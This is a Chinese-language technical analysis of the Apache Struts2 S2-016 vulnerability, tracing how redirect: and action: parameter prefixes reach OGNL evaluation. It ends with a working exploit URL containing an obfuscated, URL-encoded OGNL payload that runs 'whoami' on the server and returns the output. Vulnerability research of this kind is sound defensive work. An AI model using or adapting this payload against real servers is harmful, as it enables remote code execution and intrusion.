影响版本
Struts 2.0.0 - Struts 2.3.15
0x01 TIPs
主要成因动态代码调试
默认开启,并注意上面的四个前缀
下面这个配置在这个版本里没作用,因为漏洞判断时候调用的都是DefaultActionMapper.allowDynamicMethodCalls
0x02 分析
跟进分析
使用的2.3.15的showcase,分为两个部分,StrutsPrepareFilter&StrutsExecuteFilter
先进入StrutsPrepareFilter进行准备工作,调用PrepareOperations.findActionMapping()
进入DefaultActionMapper.getMapping,调用handleSpecialParameters处理参数
检查是否有对应的特殊方法
对应的方法,在上图第二个断点处执行,提取
redirect:
后的字符串作为结果填充进mapping
在值栈中可见
回到StrutsPrepareFilter,执行chain.doFilter(这里先进入其他Filter)进入StrutsExecuteFilter
执行ExecuteOperations.executeAction()
进入Dispatcher,这里检查mapping中是否有Result,并进行处理
进入ServletRedirectResult(这是5中创建的结果类),调用父类StrutsResultSupport.execute()
public void execute(ActionInvocation invocation) throws Exception { if (this.anchor != null) { this.anchor = this.conditionalParse(this.anchor, invocation); } super.execute(invocation); }
然后见到熟悉的
0x03 利用条件
漏洞版本
0x04 利用方式
action:
、redirect:
、redirectAction:
均可用于攻击
http://localhost:8088/showcase.action?redirect:%24%7B%23req%3D%23context.get(%27co%27%2B%27m.open%27%2B%27symphony.xwo%27%2B%27rk2.disp%27%2B%27atcher.HttpSer%27%2B%27vletReq%27%2B%27uest%27)%2C%23s%3Dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27whoami%27.toString().split(%27%5C%5Cs%27))).start().getInputStream()).useDelimiter(%27%5C%5CA%27)%2C%23str%3D%23s.hasNext()%3F%23s.next()%3A%27%27%2C%23resp%3D%23context.get(%27co%27%2B%27m.open%27%2B%27symphony.xwo%27%2B%27rk2.disp%27%2B%27atcher.HttpSer%27%2B%27vletRes%27%2B%27ponse%27)%2C%23resp.setCharacterEncoding(%27UTF-8%27)%2C%23resp.getWriter().println(%23str)%2C%23resp.getWriter().flush()%2C%23resp.getWriter().close()%7D%0A